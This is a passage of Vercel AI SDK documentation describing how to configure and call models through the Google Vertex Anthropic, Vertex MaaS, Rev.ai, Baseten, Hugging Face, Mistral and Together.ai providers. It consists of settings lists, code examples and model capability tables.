  - `credentials` (object): Object containing `client_email` and `private_key` properties, or the external account client options.
  - `clientOptions` (object): Options object passed to the constructor of the client.
  - `scopes` (string | string[]): Required scopes for the desired API request.
  - `projectId` (string): Your project ID.
  - `universeDomain` (string): The default service domain for a given Cloud universe.
- `headers` (Resolvable<Record<string, string | undefined>>): Headers to include in the requests. Can be provided in multiple formats:
  - A record of header key-value pairs: `Record<string, string | undefined>`
  - A function that returns headers: `() => Record<string, string | undefined>`
  - An async function that returns headers: `async () => Record<string, string | undefined>`
  - A promise that resolves to headers: `Promise<Record<string, string | undefined>>`
- `fetch` ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. Defaults to the global `fetch` function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Edge Runtime
Edge runtimes (like Vercel Edge Functions and Cloudflare Workers) are lightweight JavaScript environments that run closer to users at the network edge. They only provide a subset of the standard Node.js APIs. For example, direct file system access is not available, and many Node.js-specific libraries (including the standard Google Auth library) are not compatible.
The Edge runtime version of the Google Vertex Anthropic provider supports Google's Application Default Credentials through environment variables. The values can be obtained from a json credentials file from the Google Cloud Console.
For Edge runtimes, you can import the provider instance from @ai-sdk/google-vertex/anthropic/edge:
import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic/edge';
To customize the setup, use createVertexAnthropic from the same module:
import { createVertexAnthropic } from '@ai-sdk/google-vertex/anthropic/edge';
const vertexAnthropic = createVertexAnthropic({
project: 'my-project', // optional
location: 'us-central1', // optional
});
For Edge runtime authentication, set these environment variables from your Google Default Application Credentials JSON file:
- `GOOGLE_CLIENT_EMAIL`
- `GOOGLE_PRIVATE_KEY`
- `GOOGLE_PRIVATE_KEY_ID` (optional)
Optional Provider Settings
You can use the following optional settings to customize the provider instance:
- `project` (string): The Google Cloud project ID that you want to use for the API calls. It uses the `GOOGLE_VERTEX_PROJECT` environment variable by default.
- `location` (string): The Google Cloud location that you want to use for the API calls, e.g. `us-central1`. It uses the `GOOGLE_VERTEX_LOCATION` environment variable by default.
- `googleCredentials` (object): Optional. The credentials used by the Edge provider for authentication. These credentials are typically set through environment variables and are derived from a service account JSON file.
  - `clientEmail` (string): The client email from the service account JSON file. Defaults to the contents of the `GOOGLE_CLIENT_EMAIL` environment variable.
  - `privateKey` (string): The private key from the service account JSON file. Defaults to the contents of the `GOOGLE_PRIVATE_KEY` environment variable.
  - `privateKeyId` (string): The private key ID from the service account JSON file (optional). Defaults to the contents of the `GOOGLE_PRIVATE_KEY_ID` environment variable.
- `headers` (Resolvable<Record<string, string | undefined>>): Headers to include in the requests. Can be provided in multiple formats:
  - A record of header key-value pairs: `Record<string, string | undefined>`
  - A function that returns headers: `() => Record<string, string | undefined>`
  - An async function that returns headers: `async () => Record<string, string | undefined>`
  - A promise that resolves to headers: `Promise<Record<string, string | undefined>>`
- `fetch` ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. Defaults to the global `fetch` function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create models that call the Anthropic Messages API using the provider instance.
The first argument is the model id, e.g. claude-3-haiku-20240307.
Some models have multi-modal capabilities.
const model = vertexAnthropic('claude-3-haiku-20240307');
You can use Anthropic language models to generate text with the generateText function:
import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
model: vertexAnthropic('claude-3-haiku-20240307'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Anthropic language models can also be used in the streamText, generateObject, and streamObject functions
(see AI SDK Core).
The following optional provider options are available for Anthropic models:
- `sendReasoning` (boolean): Optional. Include reasoning content in requests sent to the model. Defaults to `true`. If you are experiencing issues with the model handling requests involving reasoning content, you can set this to `false` to omit them from the request.
- `thinking` (object): Optional. See the Reasoning section for more details.
- `metadata` (object): Optional. Metadata to include with the request. See the Anthropic API documentation for details.
  - `userId` (string): An external identifier for the end-user.
Reasoning
Anthropic has reasoning support for the claude-3-7-sonnet@20250219 model.
You can enable it using the thinking provider option
and specifying a thinking budget in tokens.
import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText } from 'ai';
const { text, reasoningText, reasoning } = await generateText({
model: vertexAnthropic('claude-3-7-sonnet@20250219'),
prompt: 'How many people will live in the world in 2040?',
providerOptions: {
anthropic: {
thinking: { type: 'enabled', budgetTokens: 12000 },
},
},
});
console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
console.log(text); // text response
See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.
Cache Control
In the messages and message parts, you can use the providerOptions property to set cache control breakpoints.
You need to set the anthropic property in the providerOptions object to { cacheControl: { type: 'ephemeral' } } to set a cache control breakpoint.
The cache creation input tokens are then returned in the providerMetadata object
for generateText and generateObject, again under the anthropic property.
When you use streamText or streamObject, the response contains a promise
that resolves to the metadata. Alternatively you can receive it in the
onFinish callback.
import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText } from 'ai';
const errorMessage = '... long error message ...';
const result = await generateText({
model: vertexAnthropic('claude-3-5-sonnet-20240620'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'You are a JavaScript expert.' },
{
type: 'text',
text: `Error message: ${errorMessage}`,
providerOptions: {
anthropic: { cacheControl: { type: 'ephemeral' } },
},
},
{ type: 'text', text: 'Explain the error message.' },
],
},
],
});
console.log(result.text);
console.log(result.providerMetadata?.anthropic);
// e.g. { cacheCreationInputTokens: 2118, cacheReadInputTokens: 0 }
You can also use cache control on system messages by providing multiple system messages at the head of your messages array:
const result = await generateText({
model: vertexAnthropic('claude-3-5-sonnet-20240620'),
messages: [
{
role: 'system',
content: 'Cached system message part',
providerOptions: {
anthropic: { cacheControl: { type: 'ephemeral' } },
},
},
{
role: 'system',
content: 'Uncached system message part',
},
{
role: 'user',
content: 'User prompt',
},
],
});
For more on prompt caching with Anthropic, see Google Vertex AI's Claude prompt caching documentation and Anthropic's Cache Control documentation.
Computer Use
Anthropic provides three built-in tools that can be used to interact with external systems:
- Bash Tool: Allows running bash commands.
- Text Editor Tool: Provides functionality for viewing and editing text files.
- Computer Tool: Enables control of keyboard and mouse actions on a computer.
They are available via the tools property of the provider instance.
For more background see Anthropic's Computer Use documentation.
Bash Tool
The Bash Tool allows running bash commands. Here's how to create and use it:
const bashTool = vertexAnthropic.tools.bash_20241022({
execute: async ({ command, restart }) => {
// Implement your bash command execution logic here
// Return the result of the command execution
},
});
Parameters:
- `command` (string): The bash command to run. Required unless the tool is being restarted.
- `restart` (boolean, optional): Specifying true will restart this tool.
Text Editor Tool
The Text Editor Tool provides functionality for viewing and editing text files:
const textEditorTool = vertexAnthropic.tools.textEditor_20241022({
execute: async ({
command,
path,
file_text,
insert_line,
new_str,
old_str,
view_range,
}) => {
// Implement your text editing logic here
// Return the result of the text editing operation
},
});
Parameters:
- `command` ('view' | 'create' | 'str_replace' | 'insert' | 'undo_edit'): The command to run.
- `path` (string): Absolute path to file or directory, e.g. `/repo/file.py` or `/repo`.
- `file_text` (string, optional): Required for the `create` command, with the content of the file to be created.
- `insert_line` (number, optional): Required for the `insert` command. The line number after which to insert the new string.
- `new_str` (string, optional): New string for the `str_replace` or `insert` commands.
- `old_str` (string, optional): Required for the `str_replace` command, containing the string to replace.
- `view_range` (number[], optional): Optional for the `view` command to specify the line range to show.
Computer Tool
The Computer Tool enables control of keyboard and mouse actions on a computer:
const computerTool = vertexAnthropic.tools.computer_20241022({
displayWidthPx: 1920,
displayHeightPx: 1080,
displayNumber: 0, // Optional, for X11 environments
execute: async ({ action, coordinate, text }) => {
// Implement your computer control logic here
// Return the result of the action
// Example code:
switch (action) {
case 'screenshot': {
// multipart result:
return {
type: 'image',
data: fs
.readFileSync('./data/screenshot-editor.png')
.toString('base64'),
};
}
default: {
console.log('Action:', action);
console.log('Coordinate:', coordinate);
console.log('Text:', text);
return `executed ${action}`;
}
}
},
// map to tool result content for LLM consumption:
toModelOutput(result) {
return typeof result === 'string'
? [{ type: 'text', text: result }]
: [{ type: 'image', data: result.data, mediaType: 'image/png' }];
},
});
Parameters:
- `action` ('key' | 'type' | 'mouse_move' | 'left_click' | 'left_click_drag' | 'right_click' | 'middle_click' | 'double_click' | 'screenshot' | 'cursor_position'): The action to perform.
- `coordinate` (number[], optional): Required for `mouse_move` and `left_click_drag` actions. Specifies the (x, y) coordinates.
- `text` (string, optional): Required for `type` and `key` actions.
These tools can be used in conjunction with the claude-3-5-sonnet-v2@20241022 model to enable more complex interactions and tasks.
Model Capabilities
The latest Anthropic model list on Vertex AI is available here. See also Anthropic Model Comparison.
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming | Computer Use |
|---|---|---|---|---|---|
| claude-3-7-sonnet@20250219 | | | | | |
| claude-3-5-sonnet-v2@20241022 | | | | | |
| claude-3-5-sonnet@20240620 | | | | | |
| claude-3-5-haiku@20241022 | | | | | |
| claude-3-sonnet@20240229 | | | | | |
| claude-3-haiku@20240307 | | | | | |
| claude-3-opus@20240229 | | | | | |
Google Vertex MaaS Provider Usage
The Google Vertex MaaS (Model as a Service) provider offers access to partner and open models hosted on Vertex AI through an OpenAI-compatible Chat Completions API. This includes models from DeepSeek, Qwen, Meta, MiniMax, Moonshot, and OpenAI.
For more information, see the Vertex AI MaaS documentation.
Provider Instance
You can import the default provider instance vertexMaas from @ai-sdk/google-vertex/maas:
import { vertexMaas } from '@ai-sdk/google-vertex/maas';
If you need a customized setup, you can import createVertexMaas from @ai-sdk/google-vertex/maas and create a provider instance with your settings:
import { createVertexMaas } from '@ai-sdk/google-vertex/maas';
const vertexMaas = createVertexMaas({
project: 'my-project', // optional
location: 'us-east5', // optional, defaults to 'global'
});
Node.js Runtime
For Node.js environments, the Google Vertex MaaS provider supports all standard Google Cloud authentication options through the google-auth-library:
import { createVertexMaas } from '@ai-sdk/google-vertex/maas';
const vertexMaas = createVertexMaas({
googleAuthOptions: {
credentials: {
client_email: 'my-email',
private_key: 'my-private-key',
},
},
});
Optional Provider Settings
- `project` (string): The Google Cloud project ID. Defaults to the `GOOGLE_VERTEX_PROJECT` environment variable.
- `location` (string): The Google Cloud location, e.g. `us-east5` or `global`. Defaults to the `GOOGLE_VERTEX_LOCATION` environment variable. If not set, defaults to `global`.
- `googleAuthOptions` (object): Optional. The authentication options used by the Google Auth Library.
- `headers` (Resolvable<Record<string, string | undefined>>): Headers to include in requests.
- `fetch` ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation.
Edge Runtime
For Edge runtimes, import from @ai-sdk/google-vertex/maas/edge:
import { vertexMaas } from '@ai-sdk/google-vertex/maas/edge';
import { createVertexMaas } from '@ai-sdk/google-vertex/maas/edge';
const vertexMaas = createVertexMaas({
project: 'my-project',
location: 'us-east5',
});
For Edge runtime authentication, set these environment variables:
- `GOOGLE_CLIENT_EMAIL`
- `GOOGLE_PRIVATE_KEY`
- `GOOGLE_PRIVATE_KEY_ID` (optional)
Language Models
You can create models using the provider instance. The first argument is the model ID:
import { vertexMaas } from '@ai-sdk/google-vertex/maas';
import { generateText } from 'ai';
const { text } = await generateText({
model: vertexMaas('deepseek-ai/deepseek-v3.2-maas'),
prompt: 'Invent a new holiday and describe its traditions.',
});
Streaming is also supported:
import { vertexMaas } from '@ai-sdk/google-vertex/maas';
import { streamText } from 'ai';
const result = streamText({
model: vertexMaas('deepseek-ai/deepseek-v3.2-maas'),
prompt: 'Invent a new holiday and describe its traditions.',
});
for await (const textPart of result.textStream) {
process.stdout.write(textPart);
}
Available Models
The following models are available through the MaaS provider. You can also pass any valid model ID as a string.
| Model ID | Provider |
|---|---|
| deepseek-ai/deepseek-r1-0528-maas | DeepSeek |
| deepseek-ai/deepseek-v3.1-maas | DeepSeek |
| deepseek-ai/deepseek-v3.2-maas | DeepSeek |
| openai/gpt-oss-120b-maas | OpenAI |
| openai/gpt-oss-20b-maas | OpenAI |
| meta/llama-4-maverick-17b-128e-instruct-maas | Meta |
| meta/llama-4-scout-17b-16e-instruct-maas | Meta |
| minimax/minimax-m2-maas | MiniMax |
| qwen/qwen3-coder-480b-a35b-instruct-maas | Qwen |
| qwen/qwen3-next-80b-a3b-instruct-maas | Qwen |
| qwen/qwen3-next-80b-a3b-thinking-maas | Qwen |
| moonshotai/kimi-k2-thinking-maas | Moonshot |
title: Rev.ai description: Learn how to use the Rev.ai provider for the AI SDK.
Rev.ai Provider
The Rev.ai provider contains language model support for the Rev.ai transcription API.
Setup
The Rev.ai provider is available in the @ai-sdk/revai module. You can install it with
pnpm add @ai-sdk/revai
Provider Instance
You can import the default provider instance revai from @ai-sdk/revai:
import { revai } from '@ai-sdk/revai';
If you need a customized setup, you can import createRevai from @ai-sdk/revai and create a provider instance with your settings:
import { createRevai } from '@ai-sdk/revai';
const revai = createRevai({
// custom settings, e.g.
fetch: customFetch,
});
You can use the following optional settings to customize the Rev.ai provider instance:
- apiKey string: API key that is being sent using the Authorization header. It defaults to the REVAI_API_KEY environment variable.
- headers Record<string,string>: Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>: Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Transcription Models
You can create models that call the Rev.ai transcription API
using the .transcription() factory method.
The first argument is the model id e.g. machine.
const model = revai.transcription('machine');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the input language in ISO-639-1 (e.g. en) format can sometimes improve transcription performance if known beforehand.
import { experimental_transcribe as transcribe } from 'ai';
import { revai } from '@ai-sdk/revai';
import { readFile } from 'fs/promises';
const result = await transcribe({
model: revai.transcription('machine'),
audio: await readFile('audio.mp3'),
providerOptions: { revai: { language: 'en' } },
});
The following provider options are available:
- metadata string: Optional metadata that was provided during job submission.
- notification_config object: Optional configuration for a callback url to invoke when processing is complete.
  - url string: Callback url to invoke when processing is complete.
  - auth_headers object: Optional authorization headers, if needed to invoke the callback.
    - Authorization string: Authorization header value.
- delete_after_seconds integer: Amount of time after job completion when the job is auto-deleted.
- verbatim boolean: Configures the transcriber to transcribe every syllable, including all false starts and disfluencies.
- rush boolean: [HIPAA Unsupported] Only available for the human transcriber option. When set to true, your job is given higher priority.
- skip_diarization boolean: Specify if speaker diarization will be skipped by the speech engine.
- skip_postprocessing boolean: Only available for English and Spanish languages. User-supplied preference on whether to skip post-processing operations.
- skip_punctuation boolean: Specify if "punct" type elements will be skipped by the speech engine.
- remove_disfluencies boolean: When set to true, disfluencies (like 'ums' and 'uhs') will not appear in the transcript.
- remove_atmospherics boolean: When set to true, atmospherics (like <laugh>, <affirmative>) will not appear in the transcript.
- filter_profanity boolean: When enabled, profanities will be filtered by replacing characters with asterisks except for the first and last.
- speaker_channels_count integer: Only available for English, Spanish and French languages. Specify the total number of unique speaker channels in the audio.
- speakers_count integer: Only available for English, Spanish and French languages. Specify the total number of unique speakers in the audio.
- diarization_type string: Specify the diarization type. Possible values: "standard" (default), "premium".
- custom_vocabulary_id string: Supply the id of a pre-completed custom vocabulary submitted through the Custom Vocabularies API.
- custom_vocabularies Array: Specify a collection of custom vocabulary to be used for this job.
- strict_custom_vocabulary boolean: If true, only exact phrases will be used as custom vocabulary.
- summarization_config object: Specify summarization options.
  - model string: Model type for summarization. Possible values: "standard" (default), "premium".
  - type string: Summarization formatting type. Possible values: "paragraph" (default), "bullets".
  - prompt string: Custom prompt for flexible summaries (mutually exclusive with type).
- translation_config object: Specify translation options.
  - target_languages Array: Array of target languages for translation.
  - model string: Model type for translation. Possible values: "standard" (default), "premium".
- language string: Language is provided as an ISO 639-1 language code. Default is "en".
- forced_alignment boolean: When enabled, provides improved accuracy for per-word timestamps for a transcript. Default is false. Currently supported languages: English (en, en-us, en-gb), French (fr), Italian (it), German (de), Spanish (es). Note: This option is not available in the low-cost environment.
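As a sketch combining several of these options (the option values are illustrative):
import { experimental_transcribe as transcribe } from 'ai';
import { revai } from '@ai-sdk/revai';
import { readFile } from 'fs/promises';
const result = await transcribe({
  model: revai.transcription('machine'),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    revai: {
      language: 'en',
      remove_disfluencies: true,
      // summarization options from the list above
      summarization_config: { model: 'standard', type: 'bullets' },
    },
  },
});
console.log(result.text);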
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| machine | | | | |
| low_cost | | | | |
| fusion | | | | |
title: Baseten description: Learn how to use Baseten models with the AI SDK.
Baseten Provider
Baseten is an inference platform for serving frontier, enterprise-grade, open-source AI models via their API.
Setup
The Baseten provider is available via the @ai-sdk/baseten module. You can install it with
pnpm add @ai-sdk/baseten
Provider Instance
You can import the default provider instance baseten from @ai-sdk/baseten:
import { baseten } from '@ai-sdk/baseten';
If you need a customized setup, you can import createBaseten from @ai-sdk/baseten
and create a provider instance with your settings:
import { createBaseten } from '@ai-sdk/baseten';
const baseten = createBaseten({
apiKey: process.env.BASETEN_API_KEY ?? '',
});
You can use the following optional settings to customize the Baseten provider instance:
- baseURL string: Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://inference.baseten.co/v1.
- apiKey string: API key that is being sent using the Authorization header. It defaults to the BASETEN_API_KEY environment variable. It is recommended that you set the environment variable using export so you do not need to include the field every time. You can grab your Baseten API key here.
- modelURL string: Custom model URL for specific models (chat or embeddings). If not provided, the default Model APIs will be used.
- headers Record<string,string>: Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>: Custom fetch implementation.
Model APIs
You can select Baseten models using a provider instance.
The first argument is the model id, e.g. 'moonshotai/Kimi-K2-Instruct-0905'. The complete list of models supported under Model APIs can be found here.
const model = baseten('moonshotai/Kimi-K2-Instruct-0905');
Example
You can use Baseten language models to generate text with the generateText function:
import { baseten } from '@ai-sdk/baseten';
import { generateText } from 'ai';
const { text } = await generateText({
model: baseten('moonshotai/Kimi-K2-Instruct-0905'),
prompt: 'What is the meaning of life? Answer in one sentence.',
});
Baseten language models can also be used in the streamText function
(see AI SDK Core).
Dedicated Models
Baseten supports dedicated model URLs for both chat and embedding models. You have to specify a modelURL when creating the provider:
OpenAI-Compatible Endpoints (/sync/v1)
For models deployed with Baseten's OpenAI-compatible endpoints:
import { createBaseten } from '@ai-sdk/baseten';
const baseten = createBaseten({
modelURL: 'https://model-{MODEL_ID}.api.baseten.co/sync/v1',
});
// No modelId is needed because we specified modelURL
const model = baseten();
const { text } = await generateText({
model: model,
prompt: 'Say hello from a Baseten chat model!',
});
/predict Endpoints
/predict endpoints are currently NOT supported for chat models. You must use /sync/v1 endpoints for chat functionality.
Embedding Models
You can create models that call the Baseten embeddings API using the .textEmbeddingModel() factory method. The Baseten provider uses the high-performance @basetenlabs/performance-client for optimal embedding performance.
import { createBaseten } from '@ai-sdk/baseten';
import { embed, embedMany } from 'ai';
const baseten = createBaseten({
modelURL: 'https://model-{MODEL_ID}.api.baseten.co/sync',
});
const embeddingModel = baseten.textEmbeddingModel();
// Single embedding
const { embedding } = await embed({
model: embeddingModel,
value: 'sunny day at the beach',
});
// Batch embeddings
const { embeddings } = await embedMany({
model: embeddingModel,
values: [
'sunny day at the beach',
'rainy afternoon in the city',
'snowy mountain peak',
],
});
Endpoint Support for Embeddings
Supported:
- /sync endpoints (Performance Client automatically adds /v1/embeddings)
- /sync/v1 endpoints (automatically strips /v1 before passing to Performance Client)
Not Supported:
- /predict endpoints (not compatible with Performance Client)
Performance Features
The embedding implementation includes:
- High-performance client: Uses @basetenlabs/performance-client for optimal performance
- Automatic batching: Efficiently handles multiple texts in a single request
- Connection reuse: Performance Client is created once and reused for all requests
- Built-in retries: Automatic retry logic for failed requests
Error Handling
The Baseten provider includes built-in error handling for common API errors:
import { baseten } from '@ai-sdk/baseten';
import { generateText } from 'ai';
try {
const { text } = await generateText({
model: baseten('moonshotai/Kimi-K2-Instruct-0905'),
prompt: 'Hello, world!',
});
} catch (error) {
console.error('Baseten API error:', error.message);
}
Common Error Scenarios
// Embeddings require a modelURL
try {
baseten.textEmbeddingModel();
} catch (error) {
// Error: "No model URL provided for embeddings. Please set modelURL option for embeddings."
}
// /predict endpoints are not supported for chat models
try {
const baseten = createBaseten({
modelURL:
'https://model-{MODEL_ID}.api.baseten.co/environments/production/predict',
});
baseten(); // This will throw an error
} catch (error) {
// Error: "Not supported. You must use a /sync/v1 endpoint for chat models."
}
// /sync/v1 endpoints are now supported for embeddings
const baseten = createBaseten({
modelURL:
'https://model-{MODEL_ID}.api.baseten.co/environments/production/sync/v1',
});
const embeddingModel = baseten.textEmbeddingModel(); // This works fine!
// /predict endpoints are not supported for embeddings
try {
const baseten = createBaseten({
modelURL:
'https://model-{MODEL_ID}.api.baseten.co/environments/production/predict',
});
baseten.textEmbeddingModel(); // This will throw an error
} catch (error) {
// Error: "Not supported. You must use a /sync or /sync/v1 endpoint for embeddings."
}
// Image models are not supported
try {
baseten.imageModel('test-model');
} catch (error) {
// Error: NoSuchModelError for imageModel
}
title: Hugging Face description: Learn how to use Hugging Face Provider.
Hugging Face Provider
The Hugging Face provider offers access to thousands of language models through Hugging Face Inference Providers, including models from Meta, DeepSeek, Qwen, and more.
API keys can be obtained from Hugging Face Settings.
Setup
The Hugging Face provider is available via the @ai-sdk/huggingface module. You can install it with:
pnpm add @ai-sdk/huggingface
Provider Instance
You can import the default provider instance huggingface from @ai-sdk/huggingface:
import { huggingface } from '@ai-sdk/huggingface';
For custom configuration, you can import createHuggingFace and create a provider instance with your settings:
import { createHuggingFace } from '@ai-sdk/huggingface';
const huggingface = createHuggingFace({
apiKey: process.env.HUGGINGFACE_API_KEY ?? '',
});
You can use the following optional settings to customize the Hugging Face provider instance:
- baseURL string: Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://router.huggingface.co/v1.
- apiKey string: API key that is being sent using the Authorization header. It defaults to the HUGGINGFACE_API_KEY environment variable. You can get your API key from Hugging Face Settings.
- headers Record<string,string>: Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>: Custom fetch implementation.
Language Models
You can create language models using a provider instance:
import { huggingface } from '@ai-sdk/huggingface';
import { generateText } from 'ai';
const { text } = await generateText({
model: huggingface('deepseek-ai/DeepSeek-V3-0324'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
You can also use the .responses() or .languageModel() factory methods:
const model = huggingface.responses('deepseek-ai/DeepSeek-V3-0324');
// or
const model = huggingface.languageModel('moonshotai/Kimi-K2-Instruct');
Hugging Face language models can be used in the streamText function
(see AI SDK Core).
You can explore the latest and trending models with their capabilities, context size, throughput and pricing on the Hugging Face Inference Models page.
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| meta-llama/Llama-3.1-8B-Instruct | | | | |
| meta-llama/Llama-3.1-70B-Instruct | | | | |
| meta-llama/Llama-3.3-70B-Instruct | | | | |
| meta-llama/Llama-4-Scout-17B-16E-Instruct | | | | |
| deepseek-ai/DeepSeek-V3-0324 | | | | |
| deepseek-ai/DeepSeek-R1 | | | | |
| deepseek-ai/DeepSeek-R1-Distill-Llama-70B | | | | |
| Qwen/Qwen3-235B-A22B-Instruct-2507 | | | | |
| Qwen/Qwen3-Coder-480B-A35B-Instruct | | | | |
| Qwen/Qwen2.5-VL-7B-Instruct | | | | |
| google/gemma-3-27b-it | | | | |
| moonshotai/Kimi-K2-Instruct | | | | |
title: Mistral AI description: Learn how to use Mistral.
Mistral AI Provider
The Mistral AI provider contains language model support for the Mistral chat API.
Setup
The Mistral provider is available in the @ai-sdk/mistral module. You can install it with
pnpm add @ai-sdk/mistral
Provider Instance
You can import the default provider instance mistral from @ai-sdk/mistral:
import { mistral } from '@ai-sdk/mistral';
If you need a customized setup, you can import createMistral from @ai-sdk/mistral
and create a provider instance with your settings:
import { createMistral } from '@ai-sdk/mistral';
const mistral = createMistral({
// custom settings
});
You can use the following optional settings to customize the Mistral provider instance:
- baseURL string: Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.mistral.ai/v1.
- apiKey string: API key that is being sent using the Authorization header. It defaults to the MISTRAL_API_KEY environment variable.
- headers Record<string,string>: Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>: Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create models that call the Mistral chat API using a provider instance.
The first argument is the model id, e.g. mistral-large-latest.
Some Mistral chat models support tool calls.
const model = mistral('mistral-large-latest');
Mistral chat models also support additional model settings that are not part of the standard call settings.
You can pass them as an options argument and utilize MistralLanguageModelOptions for typing:
import { mistral, type MistralLanguageModelOptions } from '@ai-sdk/mistral';
const model = mistral('mistral-large-latest');
await generateText({
model,
providerOptions: {
mistral: {
safePrompt: true, // optional safety prompt injection
parallelToolCalls: false, // disable parallel tool calls (one tool per response)
} satisfies MistralLanguageModelOptions,
},
});
The following optional provider options are available for Mistral models:
- safePrompt boolean: Whether to inject a safety prompt before all conversations. Defaults to false.
- documentImageLimit number: Maximum number of images to process in a document.
- documentPageLimit number: Maximum number of pages to process in a document.
- strictJsonSchema boolean: Whether to use strict JSON schema validation for structured outputs. Only applies when a schema is provided and only sets the strict flag in addition to using Custom Structured Outputs, which is used by default if a schema is provided. Defaults to false.
- structuredOutputs boolean: Whether to use structured outputs. When enabled, tool calls and object generation will be strict and follow the provided schema. Defaults to true.
- parallelToolCalls boolean: Whether to enable parallel function calling during tool use. When set to false, the model will use at most one tool per response. Defaults to true.
Document OCR
Mistral chat models support document OCR for PDF files. You can optionally set image and page limits using the provider options.
const result = await generateText({
model: mistral('mistral-small-latest'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model according to this document?',
},
{
type: 'file',
data: new URL(
'https://github.com/vercel/ai/blob/main/examples/ai-core/data/ai.pdf?raw=true',
),
mediaType: 'application/pdf',
},
],
},
],
// optional settings:
providerOptions: {
mistral: {
documentImageLimit: 8,
documentPageLimit: 64,
},
},
});
Reasoning Models
Mistral offers reasoning models that provide step-by-step thinking capabilities:
- magistral-small-2506: Smaller reasoning model for efficient step-by-step thinking
- magistral-medium-2506: More powerful reasoning model balancing performance and cost
These models return content that includes <think>...</think> tags containing the reasoning process. To properly extract and separate the reasoning from the final answer, use the extract reasoning middleware:
import { mistral } from '@ai-sdk/mistral';
import {
extractReasoningMiddleware,
generateText,
wrapLanguageModel,
} from 'ai';
const result = await generateText({
model: wrapLanguageModel({
model: mistral('magistral-small-2506'),
middleware: extractReasoningMiddleware({
tagName: 'think',
}),
}),
prompt: 'What is 15 * 24?',
});
console.log('REASONING:', result.reasoningText);
// Output: "Let me calculate this step by step..."
console.log('ANSWER:', result.text);
// Output: "360"
The middleware automatically parses the <think> tags and provides separate reasoningText and text properties in the result.
Example
You can use Mistral language models to generate text with the generateText function:
import { mistral } from '@ai-sdk/mistral';
import { generateText } from 'ai';
const { text } = await generateText({
model: mistral('mistral-large-latest'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Mistral language models can also be used in the streamText, generateObject, and streamObject functions
(see AI SDK Core).
Structured Outputs
Mistral chat models support structured outputs using JSON Schema. You can use generateObject or streamObject
with Zod, Valibot, or raw JSON Schema. The SDK sends your schema via Mistral's response_format: { type: 'json_schema' }.
import { mistral } from '@ai-sdk/mistral';
import { generateObject } from 'ai';
import { z } from 'zod';
const result = await generateObject({
model: mistral('mistral-large-latest'),
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(z.string()),
instructions: z.array(z.string()),
}),
}),
prompt: 'Generate a simple pasta recipe.',
});
console.log(JSON.stringify(result.object, null, 2));
You can enable strict JSON Schema validation using a provider option:
import { mistral } from '@ai-sdk/mistral';
import { generateObject } from 'ai';
import { z } from 'zod';
const result = await generateObject({
model: mistral('mistral-large-latest'),
providerOptions: {
mistral: {
strictJsonSchema: true, // reject outputs that don't strictly match the schema
},
},
schema: z.object({
title: z.string(),
items: z.array(z.object({ id: z.string(), qty: z.number().int().min(1) })),
}),
prompt: 'Generate a small shopping list.',
});
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| pixtral-large-latest | | | | |
| mistral-large-latest | | | | |
| mistral-medium-latest | | | | |
| mistral-medium-2505 | | | | |
| mistral-small-latest | | | | |
| magistral-small-2506 | | | | |
| magistral-medium-2506 | | | | |
| ministral-3b-latest | | | | |
| ministral-8b-latest | | | | |
| pixtral-12b-2409 | | | | |
| open-mistral-7b | | | | |
| open-mixtral-8x7b | | | | |
| open-mixtral-8x22b | | | | |
Embedding Models
You can create models that call the Mistral embeddings API
using the .textEmbedding() factory method.
const model = mistral.textEmbedding('mistral-embed');
You can use Mistral embedding models to generate embeddings with the embed function:
import { mistral } from '@ai-sdk/mistral';
import { embed } from 'ai';
const { embedding } = await embed({
model: mistral.textEmbedding('mistral-embed'),
value: 'sunny day at the beach',
});
Model Capabilities
| Model | Default Dimensions |
|---|---|
| mistral-embed | 1024 |
title: Together.ai description: Learn how to use Together.ai's models with the AI SDK.
Together.ai Provider
The Together.ai provider contains support for 200+ open-source models through the Together.ai API.
Setup
The Together.ai provider is available via the @ai-sdk/togetherai module. You can
install it with
pnpm add @ai-sdk/togetherai
Provider Instance
You can import the default provider instance togetherai from @ai-sdk/togetherai:
import { togetherai } from '@ai-sdk/togetherai';
If you need a customized setup, you can import createTogetherAI from @ai-sdk/togetherai
and create a provider instance with your settings:
import { createTogetherAI } from '@ai-sdk/togetherai';
const togetherai = createTogetherAI({
apiKey: process.env.TOGETHER_API_KEY ?? '',
});
You can use the following optional settings to customize the Together.ai provider instance:
